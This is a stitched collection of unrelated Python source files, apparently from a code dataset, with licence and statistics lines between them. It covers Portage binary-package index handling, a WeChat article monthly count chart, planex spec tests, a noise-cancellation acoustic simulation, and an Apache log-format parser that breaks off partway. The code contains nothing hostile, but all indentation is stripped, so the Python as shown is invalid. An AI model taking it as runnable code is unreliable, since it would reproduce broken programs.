except AlarmSignal:
writemsg("\n\n!!! %s\n" % \
_("Timed out while closing connection to binhost"),
noiselevel=-1)
except UseCachedCopyOfRemoteIndex:
writemsg_stdout("\n")
writemsg_stdout(
colorize("GOOD", _("Local copy of remote index is up-to-date and will be used.")) + \
"\n")
rmt_idx = pkgindex
except EnvironmentError as e:
writemsg(_("\n\n!!! Error fetching binhost package" \
" info from '%s'\n") % _hide_url_passwd(base_url))
writemsg("!!! %s\n\n" % str(e))
del e
pkgindex = None
if proc is not None:
if proc.poll() is None:
proc.kill()
proc.wait()
proc = None
if tmp_filename is not None:
try:
os.unlink(tmp_filename)
except OSError:
pass
if pkgindex is rmt_idx:
pkgindex.modified = False # don't update the header
try:
ensure_dirs(os.path.dirname(pkgindex_file))
f = atomic_ofstream(pkgindex_file)
pkgindex.write(f)
f.close()
except (IOError, PortageException):
if os.access(os.path.dirname(pkgindex_file), os.W_OK):
raise
# The current user doesn't have permission to cache the
# file, but that's alright.
if pkgindex:
# Organize remote package list as a cpv -> metadata map.
remotepkgs = _pkgindex_cpv_map_latest_build(pkgindex)
remote_base_uri = pkgindex.header.get("URI", base_url)
for cpv, remote_metadata in remotepkgs.items():
remote_metadata["BASE_URI"] = remote_base_uri
self._pkgindex_uri[cpv] = url
self._remotepkgs.update(remotepkgs)
self._remote_has_index = True
for cpv in remotepkgs:
self.dbapi.cpv_inject(cpv)
if True:
# Remote package instances override local package
# if they are not identical.
hash_names = ["SIZE"] + self._pkgindex_hashes
for cpv, local_metadata in metadata.items():
remote_metadata = self._remotepkgs.get(cpv)
if remote_metadata is None:
continue
# Use digests to compare identity.
identical = True
for hash_name in hash_names:
local_value = local_metadata.get(hash_name)
if local_value is None:
continue
remote_value = remote_metadata.get(hash_name)
if remote_value is None:
continue
if local_value != remote_value:
identical = False
break
if identical:
del self._remotepkgs[cpv]
else:
# Override the local package in the aux_get cache.
self.dbapi._aux_cache[cpv] = remote_metadata
else:
# Local package instances override remote instances.
for cpv in metadata:
self._remotepkgs.pop(cpv, None)
self.populated=1
def inject(self, cpv, filename=None):
"""Add a freshly built package to the database. This updates
$PKGDIR/Packages with the new package metadata (including MD5).
@param cpv: The cpv of the new package to inject
@type cpv: string
@param filename: File path of the package to inject, or None if it's
already in the location returned by getname()
@type filename: string
@rtype: None
"""
mycat, mypkg = catsplit(cpv)
if not self.populated:
self.populate()
if filename is None:
full_path = self.getname(cpv)
else:
full_path = filename
try:
s = os.stat(full_path)
except OSError as e:
if e.errno != errno.ENOENT:
raise
del e
writemsg(_("!!! Binary package does not exist: '%s'\n") % full_path,
noiselevel=-1)
return
mytbz2 = portage.xpak.tbz2(full_path)
slot = mytbz2.getfile("SLOT")
if slot is None:
writemsg(_("!!! Invalid binary package: '%s'\n") % full_path,
noiselevel=-1)
return
slot = slot.strip()
self.dbapi.cpv_inject(cpv)
# Reread the Packages index (in case it's been changed by another
# process) and then updated it, all while holding a lock.
pkgindex_lock = None
created_symlink = False
try:
pkgindex_lock = lockfile(self._pkgindex_file,
wantnewlockfile=1)
if filename is not None:
new_filename = self.getname(cpv)
try:
samefile = os.path.samefile(filename, new_filename)
except OSError:
samefile = False
if not samefile:
self._ensure_dir(os.path.dirname(new_filename))
_movefile(filename, new_filename, mysettings=self.settings)
if self._all_directory and \
self.getname(cpv).split(os.path.sep)[-2] == "All":
self._create_symlink(cpv)
created_symlink = True
pkgindex = self._load_pkgindex()
if not self._pkgindex_version_supported(pkgindex):
pkgindex = self._new_pkgindex()
# Discard remote metadata to ensure that _pkgindex_entry
# gets the local metadata. This also updates state for future
# isremote calls.
if self._remotepkgs is not None:
self._remotepkgs.pop(cpv, None)
# Discard cached metadata to ensure that _pkgindex_entry
# doesn't return stale metadata.
self.dbapi._aux_cache.pop(cpv, None)
try:
d = self._pkgindex_entry(cpv)
except portage.exception.InvalidDependString:
writemsg(_("!!! Invalid binary package: '%s'\n") % \
self.getname(cpv), noiselevel=-1)
self.dbapi.cpv_remove(cpv)
del self._pkg_paths[cpv]
return
# If found, remove package(s) with duplicate path.
path = d.get("PATH", "")
for i in range(len(pkgindex.packages) - 1, -1, -1):
d2 = pkgindex.packages[i]
if path and path == d2.get("PATH"):
# Handle path collisions in $PKGDIR/All
# when CPV is not identical.
del pkgindex.packages[i]
elif cpv == d2.get("CPV"):
if path == d2.get("PATH", ""):
del pkgindex.packages[i]
elif created_symlink and not d2.get("PATH", ""):
# Delete entry for the package that was just
# overwritten by a symlink to this package.
del pkgindex.packages[i]
pkgindex.packages.append(d)
self._update_pkgindex_header(pkgindex.header)
self._pkgindex_write(pkgindex)
finally:
if pkgindex_lock:
unlockfile(pkgindex_lock)
def _pkgindex_write(self, pkgindex):
contents = codecs.getwriter(_encodings['repo.content'])(io.BytesIO())
pkgindex.write(contents)
contents = contents.getvalue()
atime = mtime = long(pkgindex.header["TIMESTAMP"])
output_files = [(atomic_ofstream(self._pkgindex_file, mode="wb"),
self._pkgindex_file, None)]
if "compress-index" in self.settings.features:
gz_fname = self._pkgindex_file + ".gz"
fileobj = atomic_ofstream(gz_fname, mode="wb")
output_files.append((GzipFile(filename='', mode="wb",
fileobj=fileobj, mtime=mtime), gz_fname, fileobj))
for f, fname, f_close in output_files:
f.write(contents)
f.close()
if f_close is not None:
f_close.close()
# some seconds might have elapsed since TIMESTAMP
os.utime(fname, (atime, mtime))
def _pkgindex_entry(self, cpv):
"""
Performs checksums and evaluates USE flag conditionals.
Raises InvalidDependString if necessary.
@rtype: dict
@return: a dict containing entry for the give cpv.
"""
pkg_path = self.getname(cpv)
d = dict(zip(self._pkgindex_aux_keys,
self.dbapi.aux_get(cpv, self._pkgindex_aux_keys)))
d.update(perform_multiple_checksums(
pkg_path, hashes=self._pkgindex_hashes))
d["CPV"] = cpv
st = os.stat(pkg_path)
d["MTIME"] = str(st[stat.ST_MTIME])
d["SIZE"] = str(st.st_size)
rel_path = self._pkg_paths[cpv]
# record location if it's non-default
if rel_path != cpv + ".tbz2":
d["PATH"] = rel_path
self._eval_use_flags(cpv, d)
return d
def _new_pkgindex(self):
return portage.getbinpkg.PackageIndex(
allowed_pkg_keys=self._pkgindex_allowed_pkg_keys,
default_header_data=self._pkgindex_default_header_data,
default_pkg_data=self._pkgindex_default_pkg_data,
inherited_keys=self._pkgindex_inherited_keys,
translated_keys=self._pkgindex_translated_keys)
def _update_pkgindex_header(self, header):
portdir = normalize_path(os.path.realpath(self.settings["PORTDIR"]))
profiles_base = os.path.join(portdir, "profiles") + os.path.sep
if self.settings.profile_path:
profile_path = normalize_path(
os.path.realpath(self.settings.profile_path))
if profile_path.startswith(profiles_base):
profile_path = profile_path[len(profiles_base):]
header["PROFILE"] = profile_path
header["VERSION"] = str(self._pkgindex_version)
base_uri = self.settings.get("PORTAGE_BINHOST_HEADER_URI")
if base_uri:
header["URI"] = base_uri
else:
header.pop("URI", None)
for k in self._pkgindex_header_keys:
v = self.settings.get(k, None)
if v:
header[k] = v
else:
header.pop(k, None)
def _pkgindex_version_supported(self, pkgindex):
version = pkgindex.header.get("VERSION")
if version:
try:
if int(version) <= self._pkgindex_version:
return True
except ValueError:
pass
return False
def _eval_use_flags(self, cpv, metadata):
use = frozenset(metadata["USE"].split())
raw_use = use
iuse = set(f.lstrip("-+") for f in metadata["IUSE"].split())
use = [f for f in use if f in iuse]
use.sort()
metadata["USE"] = " ".join(use)
for k in self._pkgindex_use_evaluated_keys:
if k.endswith('DEPEND'):
token_class = Atom
else:
token_class = None
try:
deps = metadata[k]
deps = use_reduce(deps, uselist=raw_use, token_class=token_class)
deps = paren_enclose(deps)
except portage.exception.InvalidDependString as e:
writemsg("%s: %s\n" % (k, str(e)),
noiselevel=-1)
raise
metadata[k] = deps
def exists_specific(self, cpv):
if not self.populated:
self.populate()
return self.dbapi.match(
dep_expand("="+cpv, mydb=self.dbapi, settings=self.settings))
def dep_bestmatch(self, mydep):
"compatibility method -- all matches, not just visible ones"
if not self.populated:
self.populate()
writemsg("\n\n", 1)
writemsg("mydep: %s\n" % mydep, 1)
mydep = dep_expand(mydep, mydb=self.dbapi, settings=self.settings)
writemsg("mydep: %s\n" % mydep, 1)
mykey = dep_getkey(mydep)
writemsg("mykey: %s\n" % mykey, 1)
mymatch = best(match_from_list(mydep,self.dbapi.cp_list(mykey)))
writemsg("mymatch: %s\n" % mymatch, 1)
if mymatch is None:
return ""
return mymatch
def getname(self, pkgname):
"""Returns a file location for this package. The default location is
${PKGDIR}/All/${PF}.tbz2, but will be ${PKGDIR}/${CATEGORY}/${PF}.tbz2
in the rare event of a collision. The prevent_collision() method can
be called to ensure that ${PKGDIR}/All/${PF}.tbz2 is available for a
specific cpv."""
if not self.populated:
self.populate()
mycpv = pkgname
mypath = self._pkg_paths.get(mycpv, None)
if mypath:
return os.path.join(self.pkgdir, mypath)
mycat, mypkg = catsplit(mycpv)
if self._all_directory:
mypath = os.path.join("All", mypkg + ".tbz2")
if mypath in self._pkg_paths.values():
mypath = os.path.join(mycat, mypkg + ".tbz2")
else:
mypath = os.path.join(mycat, mypkg + ".tbz2")
self._pkg_paths[mycpv] = mypath # cache for future lookups
return os.path.join(self.pkgdir, mypath)
def isremote(self, pkgname):
"""Returns true if the package is kept remotely and it has not been
downloaded (or it is only partially downloaded)."""
if self._remotepkgs is None or pkgname not in self._remotepkgs:
return False
# Presence in self._remotepkgs implies that it's remote. When a
# package is downloaded, state is updated by self.inject().
return True
def get_pkgindex_uri(self, pkgname):
"""Returns the URI to the Packages file for a given package."""
return self._pkgindex_uri.get(pkgname)
def gettbz2(self, pkgname):
"""Fetches the package from a remote site, if necessary. Attempts to
resume if the file appears to be partially downloaded."""
tbz2_path = self.getname(pkgname)
tbz2name = os.path.basename(tbz2_path)
resume = False
if os.path.exists(tbz2_path):
if tbz2name[:-5] not in self.invalids:
return
else:
resume = True
writemsg(_("Resuming download of this tbz2, but it is possible that it is corrupt.\n"),
noiselevel=-1)
mydest = os.path.dirname(self.getname(pkgname))
self._ensure_dir(mydest)
# urljoin doesn't work correctly with unrecognized protocols like sftp
if self._remote_has_index:
rel_url = self._remotepkgs[pkgname].get("PATH")
if not rel_url:
rel_url = pkgname+".tbz2"
remote_base_uri = self._remotepkgs[pkgname]["BASE_URI"]
url = remote_base_uri.rstrip("/") + "/" + rel_url.lstrip("/")
else:
url = self.settings["PORTAGE_BINHOST"].rstrip("/") + "/" + tbz2name
protocol = urlparse(url)[0]
fcmd_prefix = "FETCHCOMMAND"
if resume:
fcmd_prefix = "RESUMECOMMAND"
fcmd = self.settings.get(fcmd_prefix + "_" + protocol.upper())
if not fcmd:
fcmd = self.settings.get(fcmd_prefix)
success = portage.getbinpkg.file_get(url, mydest, fcmd=fcmd)
if not success:
try:
os.unlink(self.getname(pkgname))
except OSError:
pass
raise portage.exception.FileNotFound(mydest)
self.inject(pkgname)
def _load_pkgindex(self):
pkgindex = self._new_pkgindex()
try:
f = io.open(_unicode_encode(self._pkgindex_file,
encoding=_encodings['fs'], errors='strict'),
mode='r', encoding=_encodings['repo.content'],
errors='replace')
except EnvironmentError:
pass
else:
try:
pkgindex.read(f)
finally:
f.close()
return pkgindex
def digestCheck(self, pkg):
"""
Verify digests for the given package and raise DigestException
if verification fails.
@rtype: bool
@return: True if digests could be located, False otherwise.
"""
cpv = pkg
if not isinstance(cpv, basestring):
cpv = pkg.cpv
pkg = None
pkg_path = self.getname(cpv)
metadata = None
if self._remotepkgs is None or cpv not in self._remotepkgs:
for d in self._load_pkgindex().packages:
if d["CPV"] == cpv:
metadata = d
break
else:
metadata = self._remotepkgs[cpv]
if metadata is None:
return False
digests = {}
for k in hashfunc_map:
v = metadata.get(k)
if not v:
continue
digests[k] = v
if "SIZE" in metadata:
try:
digests["size"] = int(metadata["SIZE"])
except ValueError:
writemsg(_("!!! Malformed SIZE attribute in remote " \
"metadata for '%s'\n") % cpv)
if not digests:
return False
hash_filter = _hash_filter(
self.settings.get("PORTAGE_CHECKSUM_FILTER", ""))
if not hash_filter.transparent:
digests = _apply_hash_filter(digests, hash_filter)
eout = EOutput()
eout.quiet = self.settings.get("PORTAGE_QUIET") == "1"
ok, st = _check_distfile(pkg_path, digests, eout, show_errors=0)
if not ok:
ok, reason = verify_all(pkg_path, digests)
if not ok:
raise portage.exception.DigestException(
(pkg_path,) + tuple(reason))
return True
def getslot(self, mycatpkg):
"Get a slot for a catpkg; assume it exists."
myslot = ""
try:
myslot = self.dbapi._pkg_str(mycatpkg, None).slot
except KeyError:
pass
return myslot
| gpl-2.0 | -7,462,835,677,793,273,000 | 30.585795 | 91 | 0.652544 | false |
hhj0325/pystock | com/hhj/sogou/countByTime.py | 1 | 1082 | """
选取发布时间为2018年的文章,并对其进行月份统计
"""
import numpy as np
import pandas as pd
from pyecharts import Bar
df = pd.read_csv('sg_articles.csv', header=None, names=["title", "article", "name", "date"])
list1 = []
list2 = []
for j in df['date']:
# 获取文章发布年份及月份
time_1 = j.split('-')[0]
time_2 = j.split('-')[1]
list1.append(time_1)
list2.append(time_2)
df['year'] = list1
df['month'] = list2
# 选取发布时间为2018年的文章,并对其进行月份统计
df = df.loc[df['year'] == '2018']
month_message = df.groupby(['month'])
month_com = month_message['month'].agg(['count'])
month_com.reset_index(inplace=True)
month_com_last = month_com.sort_index()
attr = ["{}".format(str(i) + '月') for i in range(1, 12)]
v1 = np.array(month_com_last['count'])
v1 = ["{}".format(int(i)) for i in v1]
bar = Bar("微信文章发布时间分布", title_pos='center', title_top='18', width=800, height=400)
bar.add("", attr, v1, is_stack=True, is_label_show=True)
bar.render("微信文章发布时间分布.html") | apache-2.0 | 4,181,870,580,663,964,700 | 27.333333 | 92 | 0.641328 | false |
simonjbeaumont/planex | tests/test_planex_spec.py | 1 | 6322 | # Run these tests with 'nosetests':
# install the 'python-nose' package (Fedora/CentOS or Ubuntu)
# run 'nosetests' in the root of the repository
import unittest
import platform
import planex.spec
def get_rpm_machine():
if platform.machine() == 'x86_64':
return 'x86_64'
return 'i386'
def get_deb_machine():
if platform.machine() == 'x86_64':
return 'amd64'
return 'i386'
class RpmTests(unittest.TestCase):
def setUp(self):
# 'setUp' breaks Pylint's naming rules
# pylint: disable=C0103
self.spec = planex.spec.Spec("tests/data/ocaml-cohttp.spec",
dist=".el6")
def test_good_filename_preprocessor(self):
planex.spec.Spec("tests/data/ocaml-cohttp.spec.in")
def test_bad_filename(self):
self.assertRaises(planex.spec.SpecNameMismatch, planex.spec.Spec,
"tests/data/bad-name.spec")
def test_bad_filename_preprocessor(self):
self.assertRaises(planex.spec.SpecNameMismatch, planex.spec.Spec,
"tests/data/bad-name.spec.in")
def test_name(self):
self.assertEqual(self.spec.name(), "ocaml-cohttp")
def test_specpath(self):
self.assertEqual(self.spec.specpath(), "./SPECS/ocaml-cohttp.spec")
def test_version(self):
self.assertEqual(self.spec.version(), "0.9.8")
def test_provides(self):
self.assertEqual(
self.spec.provides(),
set(["ocaml-cohttp", "ocaml-cohttp-devel"]))
def test_source_urls(self):
self.assertEqual(
self.spec.source_urls(),
["https://github.com/mirage/ocaml-cohttp/archive/"
"ocaml-cohttp-0.9.8/ocaml-cohttp-0.9.8.tar.gz",
"file:///code/ocaml-cohttp-extra#ocaml-cohttp-extra-0.9.8.tar.gz",
"ocaml-cohttp-init"])
def test_source_paths(self):
self.assertEqual(
self.spec.source_paths(),
["./SOURCES/ocaml-cohttp-0.9.8.tar.gz",
"./SOURCES/ocaml-cohttp-extra-0.9.8.tar.gz",
"./SOURCES/ocaml-cohttp-init"])
def test_buildrequires(self):
self.assertEqual(
self.spec.buildrequires(),
set(["ocaml", "ocaml-findlib", "ocaml-re-devel",
"ocaml-uri-devel", "ocaml-cstruct-devel",
"ocaml-lwt-devel", "ocaml-ounit-devel",
"ocaml-ocamldoc", "ocaml-camlp4-devel",
"openssl", "openssl-devel"]))
def test_source_package_path(self):
self.assertEqual(
self.spec.source_package_path(),
"./SRPMS/ocaml-cohttp-0.9.8-1.el6.src.rpm")
def test_binary_package_paths(self):
machine = get_rpm_machine()
self.assertEqual(
sorted(self.spec.binary_package_paths()),
[
path.format(machine=machine) for path in
sorted([
"./RPMS/{machine}/ocaml-cohttp-0.9.8-1.el6.{machine}.rpm",
"./RPMS/{machine}/" +
"ocaml-cohttp-devel-0.9.8-1.el6.{machine}.rpm"])
]
)
class DebTests(unittest.TestCase):
def setUp(self):
# 'setUp' breaks Pylint's naming rules
# pylint: disable=C0103
def map_rpm_to_deb(name):
mapping = {"ocaml-cohttp": ["libcohttp-ocaml"],
"ocaml-cohttp-devel": ["libcohttp-ocaml-dev"],
"ocaml": ["ocaml-nox", "ocaml-native-compilers"],
"ocaml-findlib": ["ocaml-findlib"],
"ocaml-re-devel": ["libre-ocaml-dev"],
"ocaml-uri-devel": ["liburi-ocaml-dev"],
"ocaml-cstruct-devel": ["libcstruct-ocaml-dev"],
"ocaml-lwt-devel": ["liblwt-ocaml-dev"],
"ocaml-ounit-devel": ["libounit-ocaml-dev"],
"ocaml-ocamldoc": ["ocaml-nox"],
"ocaml-camlp4-devel": ["camlp4", "camlp4-extra"],
"openssl": ["libssl1.0.0"],
"openssl-devel": ["libssl-dev"]}
return mapping[name]
self.spec = planex.spec.Spec("./tests/data/ocaml-cohttp.spec",
target="deb",
map_name=map_rpm_to_deb)
def test_name(self):
self.assertEqual(self.spec.name(), "ocaml-cohttp")
def test_specpath(self):
self.assertEqual(self.spec.specpath(), "./SPECS/ocaml-cohttp.spec")
def test_version(self):
self.assertEqual(self.spec.version(), "0.9.8")
def test_provides(self):
self.assertEqual(
self.spec.provides(),
set(["libcohttp-ocaml", "libcohttp-ocaml-dev"]))
def test_source_urls(self):
self.assertEqual(
self.spec.source_urls(),
["https://github.com/mirage/ocaml-cohttp/archive/" +
"ocaml-cohttp-0.9.8/ocaml-cohttp-0.9.8.tar.gz",
"file:///code/ocaml-cohttp-extra#ocaml-cohttp-extra-0.9.8.tar.gz",
"ocaml-cohttp-init"])
def test_source_paths(self):
self.assertEqual(
self.spec.source_paths(),
["./SOURCES/ocaml-cohttp-0.9.8.tar.gz",
"./SOURCES/ocaml-cohttp-extra-0.9.8.tar.gz",
"./SOURCES/ocaml-cohttp-init"])
def test_buildrequires(self):
self.assertEqual(
self.spec.buildrequires(),
set(["ocaml-nox", "ocaml-native-compilers",
"ocaml-findlib", "libre-ocaml-dev",
"liburi-ocaml-dev", "libcstruct-ocaml-dev",
"liblwt-ocaml-dev", "libounit-ocaml-dev",
"camlp4", "camlp4-extra", "libssl1.0.0",
"libssl-dev"]))
def test_source_package_path(self):
self.assertEqual(
self.spec.source_package_path(),
"./SRPMS/libcohttp-ocaml_0.9.8-1.dsc")
def test_binary_package_paths(self):
machine = get_deb_machine()
self.assertEqual(
sorted(self.spec.binary_package_paths()),
[path.format(machine=machine) for path
in sorted(["./RPMS/libcohttp-ocaml_0.9.8-1_{machine}.deb",
"./RPMS/libcohttp-ocaml-dev_0.9.8-1_{machine}.deb"])])
| lgpl-2.1 | 710,548,437,859,340,000 | 35.543353 | 79 | 0.542708 | false |
szarvas/anc-field | examples/ie224-impulse.py | 1 | 5152 | # -*- coding: utf-8 -*-
from __future__ import division
import numpy as np
import matplotlib.pyplot as plt
from scipy import signal, stats
import sys
sys.path.append('..')
from anc_field_py.ancfield import *
from anc_field_py.ancutil import *
def add_microphones(ancObject):
# error_mic
ancObject.AddMic([4,1.6,5.3])
# reference_front
ancObject.AddMic([4,1.6,4.5])
# reference_back
ancObject.AddMic([4,1.6,6.5])
# reference_left
ancObject.AddMic([3,1.6,5.5])
# reference_right
ancObject.AddMic([5,1.6,5.5])
# reference_bottom
ancObject.AddMic([4,0.6,5.5])
# reference_top
ancObject.AddMic([4,2.6,5.5])
return ancObject
# =========================================================================
# SIMULATION 1
# Calculating noise to microphone paths
# =========================================================================
#
# Trying to run this simulation on CPU failed on an i7-3770, compiling the
# lrs_1.cl file fails. It maybe because the scene's size is too large for
# the CPU. Compiling it for the built in integrated GPU worked though.
#
# We create a simulation and immediately add microphones to it
anc = add_microphones(AncField('gpu', 'models/ie224'))
# noise_source
anc.AddSource([4,1.6,1.0], 5*impulse(2000, 6*32000, 32000))
anc.Visualize(1.6)
(x,y_noise) = anc.Run(4)
# Saving the impulse responses
np.savetxt('ie224-noise-to-error.dat', y_noise[0,:])
np.savetxt('ie224-noise-to-reference_front.dat', y_noise[1,:])
np.savetxt('ie224-noise-to-reference_back.dat', y_noise[2,:])
np.savetxt('ie224-noise-to-reference_left.dat', y_noise[3,:])
np.savetxt('ie224-noise-to-reference_right.dat', y_noise[4,:])
np.savetxt('ie224-noise-to-reference_bottom.dat', y_noise[5,:])
np.savetxt('ie224-noise-to-reference_top.dat', y_noise[6,:])
# =========================================================================
# SIMULATION 2
# Calculating actuator to microphone paths
# =========================================================================
#
# We create a simulation and immediately add microphones to it
anc = add_microphones(AncField('gpu', 'models/ie224'))
# actuator
anc.AddSource([4,1.6,5.5], 5*impulse(2000, 6*32000, 32000))
anc.Visualize(1.6)
(x,y_actuator) = anc.Run(4)
# Saving the impulse responses
np.savetxt('ie224-actuator-to-error.dat', y_actuator[0,:])
np.savetxt('ie224-actuator-to-reference_front.dat', y_actuator[1,:])
np.savetxt('ie224-actuator-to-reference_back.dat', y_actuator[2,:])
np.savetxt('ie224-actuator-to-reference_left.dat', y_actuator[3,:])
np.savetxt('ie224-actuator-to-reference_right.dat', y_actuator[4,:])
np.savetxt('ie224-actuator-to-reference_bottom.dat', y_actuator[5,:])
np.savetxt('ie224-actuator-to-reference_top.dat', y_actuator[6,:])
# =========================================================================
# GENERATING IMAGES FOR THE REPORT
# Calculating actuator to microphone paths
# =========================================================================
#
# Saving figures for the field simulation report
fig, ax = plt.subplots()
ax.plot(y_noise[0,:])
plt.title('ie224-noise-to-error')
fig.savefig('ie224-noise-to-error.png')
fig, ax = plt.subplots()
ax.plot(y_noise[1,:])
plt.title('ie224-noise-to-reference_front')
fig.savefig('ie224-noise-to-reference_front.png')
fig, ax = plt.subplots()
ax.plot(y_noise[2,:])
plt.title('ie224-noise-to-reference_back')
fig.savefig('ie224-noise-to-reference_back.png')
fig, ax = plt.subplots()
ax.plot(y_noise[3,:])
plt.title('ie224-noise-to-reference_left')
fig.savefig('ie224-noise-to-reference_left.png')
fig, ax = plt.subplots()
ax.plot(y_noise[4,:])
plt.title('ie224-noise-to-reference_right')
fig.savefig('ie224-noise-to-reference_right.png')
fig, ax = plt.subplots()
ax.plot(y_noise[5,:])
plt.title('ie224-noise-to-reference_bottom')
fig.savefig('ie224-noise-to-reference_bottom.png')
fig, ax = plt.subplots()
ax.plot(y_noise[6,:])
plt.title('ie224-noise-to-reference_top')
fig.savefig('ie224-noise-to-reference_top.png')
# Saving figures for the field simulation report
fig, ax = plt.subplots()
ax.plot(y_actuator[0,:])
plt.title('ie224-actuator-to-error')
fig.savefig('ie224-actuator-to-error.png')
fig, ax = plt.subplots()
ax.plot(y_actuator[1,:])
plt.title('ie224-actuator-to-reference_front')
fig.savefig('ie224-actuator-to-reference_front.png')
fig, ax = plt.subplots()
ax.plot(y_actuator[2,:])
plt.title('ie224-actuator-to-reference_back')
fig.savefig('ie224-actuator-to-reference_back.png')
fig, ax = plt.subplots()
ax.plot(y_actuator[3,:])
plt.title('ie224-actuator-to-reference_left')
fig.savefig('ie224-actuator-to-reference_left.png')
fig, ax = plt.subplots()
ax.plot(y_actuator[4,:])
plt.title('ie224-actuator-to-reference_right')
fig.savefig('ie224-actuator-to-reference_right.png')
fig, ax = plt.subplots()
ax.plot(y_actuator[5,:])
plt.title('ie224-actuator-to-reference_bottom')
fig.savefig('ie224-actuator-to-reference_bottom.png')
fig, ax = plt.subplots()
ax.plot(y_actuator[6,:])
plt.title('ie224-actuator-to-reference_top')
fig.savefig('ie224-actuator-to-reference_top.png')
| gpl-3.0 | -1,775,381,104,183,834,000 | 28.44 | 75 | 0.646545 | false |
minersoft/httpd_logs | apache_log.py | 1 | 13255 | #
# Copyright Michael Groys, 2014
#
from ncsa_log import NCSALogFormat, NCSALogRecord, FieldNotDefinedException
from m.utilities import mergeDictionaries
import re
class ApacheLogFormat(NCSALogFormat):
idpattern = r"\>?[a-zA-Z]|\{[-\w]+\}[ieoC]"
# continue field numbering after NCSA basic fields
START_FIELD = NCSALogFormat.NUM_FIELDS
FLD_REMOTE_IP = START_FIELD
FLD_LOCAL_IP = START_FIELD+1
FLD_DURATION_USEC = START_FIELD+2
FLD_FILENAME = START_FIELD+3
FLD_KEEPALIVE_NUM = START_FIELD+4
FLD_PORT = START_FIELD+5
FLD_WORKER_PID = START_FIELD+6
FLD_QUERY_STRING = START_FIELD+7
FLD_HANDLER = START_FIELD+8
FLD_DURATION_SEC = START_FIELD+9
FLD_DEFINED_SERVER_NAME = START_FIELD+10
FLD_SERVER_NAME = START_FIELD+11
FLD_CONNECTION_STATUS = START_FIELD+12
FLD_RECEIVED_BYTES = START_FIELD+13
FLD_SENT_BYTES = START_FIELD+14
FLD_USER_AGENT = START_FIELD+15
FLD_REFERER = START_FIELD+16
FLD_CONTENT_TYPE = START_FIELD+17
FLD_CONTENT_LENGTH = START_FIELD+18
NUM_FIELDS = START_FIELD+19
ourFieldReferences = {
"a": [("remoteIp", FLD_REMOTE_IP)],
"A": [("localIp", FLD_LOCAL_IP)],
"B": [("bytesZero", NCSALogFormat.FLD_NUMBYTES)],
"D": [("durationUsec", FLD_DURATION_USEC)],
"f": [("filename", FLD_FILENAME)],
"H": [("protocol", NCSALogFormat.FLD_PROTOCOL)],
"k": [("keepaliveNum", FLD_KEEPALIVE_NUM)],
"m": [("method", NCSALogFormat.FLD_METHOD)],
"p": [("port", FLD_PORT)],
"P": [("workerPid", FLD_WORKER_PID)],
"q": [("queryString", NCSALogFormat.FLD_QUERY_STRING)],
"R": [("handler", FLD_HANDLER)],
"T": [("durationSec", FLD_DURATION_SEC)],
"U": [("urlPath", NCSALogFormat.FLD_URL_PATH)],
"v": [("definedServerName", FLD_DEFINED_SERVER_NAME)],
"V": [("serverName", FLD_SERVER_NAME)],
"X": [("connectionStatus", FLD_CONNECTION_STATUS)],
"I": [("receivedBytes", FLD_RECEIVED_BYTES)],
"O": [("sentBytes", FLD_SENT_BYTES)],
"{User-agent}i":[("_User_agent_i", FLD_USER_AGENT)],
"{Referer}i": [("_Referer_i", FLD_REFERER)],
"{Content-type}o": [("_Content_type_o", FLD_CONTENT_TYPE)],
"{Content-length}o": [("_Content_length_o", FLD_CONTENT_LENGTH)],
}
fieldReferences = mergeDictionaries(NCSALogFormat.fieldReferences, ourFieldReferences)
ourFieldPatterns = {
"a": r"(?P<remoteIp>\d+\.\d+\.\d+\.d+|[0-9a-fA-F:]+)",
"A": r"(?P<localIp>\d+\.\d+\.\d+\.d+|[0-9a-fA-F:]+)",
"B": r"(?P<bytesZero>\d+)",
"D": r"(?P<durationUsec>\d+)",
"f": r"(?P<filename>[^\s]+)",
"H": r"(?P<protocol>[\w/.]+)",
"k": r"(?P<keepaliveNum>\d+)",
"m": r"(?P<method>[A-Z]+)",
"p": r"(?P<port>\d+)",
"P": r"(?P<workerPid>\d+)",
"q": r"(?P<queryString>\?[^\s]+|)",
"R": r"(?P<handler>[^\s]+)",
"T": r"(?P<durationSec>\d+)",
"U": r"(?P<urlPath>[^\s?]+)",
"v": r"(?P<definedServerName>[^\s]+)",
"V": r"(?P<serverName>[^\s]+)",
"X": r"(?P<connectionStatus>[-X+])",
"I": r"(?P<receivedBytes>\d+)",
"O": r"(?P<sentBytes>\d+)",
"{User-agent}i": r"(?P<_User_agent_i>[^\"]*)",
"{Referer}i": r"(?P<_Referer_i>[^\s]+|-)",
"{Content-type}o": r"(?P<_Content_type_o>[^\"]+|-)",
"{Content-length}o": r"(?P<_Content_length_o>\d+|-)",
}
fieldPatterns = mergeDictionaries(NCSALogFormat.fieldPatterns, ourFieldPatterns)
# exceptional fields have both direct access and access via corresponding container
exceptionalFields = set(["{User-agent}i", "{Referer}i", "{Content-type}o", "{Content-length}o"])
predefinedFormats = {
"common": "%h %l %u %t \"%r\" %>s %b",
"vcommon": "%v %h %l %u %t \"%r\" %>s %b",
"extended": "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-agent}i\"",
"combined": "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-agent}i\"",
}
def __init__(self, formatStr):
self.inputHdrFields = {}
self.outputHdrFields = {}
self.envFields = {}
self.cookieFields = {}
resolved = ApacheLogFormat.predefinedFormats.get(formatStr)
if resolved:
formatStr = resolved
NCSALogFormat.__init__(self, formatStr)
fieldSubRE = re.compile("[-{}]")
def getCollectionFieldGroupName(self, field):
return ApacheLogFormat.fieldSubRE.sub("_", field)
def getPattern(self, field, default):
if field.startswith("{"):
if field in self.__class__.exceptionalFields:
pattern = NCSALogFormat.getPattern(self, field, default)
elif len(field)>3 and (field[-2:] in ["}i", "}o", "}e", "}c"]):
groupName =self.getCollectionFieldGroupName(field)
pattern = r"(?P<%s>.*)" % groupName
else:
pattern = default
else:
pattern = NCSALogFormat.getPattern(self, field, default)
return pattern
def registerFieldReferences(self, field):
NCSALogFormat.registerFieldReferences(self, field)
if len(field)>3:
if field[-2:] == "}i":
self.addReference(self.getCollectionFieldGroupName(field), self.inputHdrFields, field[1:-2])
elif field[-2:] == "}o":
self.addReference(self.getCollectionFieldGroupName(field), self.outputHdrFields, field[1:-2])
elif field[-2:] == "}e":
self.addReference(self.getCollectionFieldGroupName(field), self.envHdrFields, field[1:-2])
elif field[-2:] == "}C":
self.addReference(self.getCollectionFieldGroupName(field), self.cookieHdrFields, field[1:-2])
def getInputHdrField(self, fieldName, matchObj):
groupId = self.inputHdrFields.get(fieldName)
if fieldName is None:
